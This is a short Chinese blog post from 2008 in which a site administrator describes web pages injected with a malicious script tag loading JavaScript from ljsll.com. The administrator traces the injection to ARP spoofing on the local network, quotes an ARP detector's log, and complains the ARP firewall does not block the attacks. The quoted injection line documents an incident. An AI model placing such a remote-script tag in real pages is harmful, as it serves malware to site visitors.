上午打开网站发现网站都夹带了恶意代码
<script src=http://3.ljsll.com/1.js></script>
然后查看服务器没有问题,问了机房也没有问题,打开河南招生考试办公室的网站,发现也有这恶意代码,然后确定的本局域网出现问题...安装奇虎360的arp检测工具,就查出来个这,感觉没有以前的版本好用.
时间2008-6-26 09:59:12
欺骗方式:本机被欺骗
欺骗机MAC地址:00-17-31-13-21-f7
欺骗机IP地址:192.168.1.142(可能被假冒)
本次攻击原机器名:4DCEF0052B8247F
网管IP and MAC:
192.168.1.1 00-0a-eb-dd-23-0c
2008年6月28日补充:奇虎ARP防火墙基本算是个垃圾,时能拦截提示,显示已拦截到一个ARP欺骗数据包,但是也不能拦截攻击…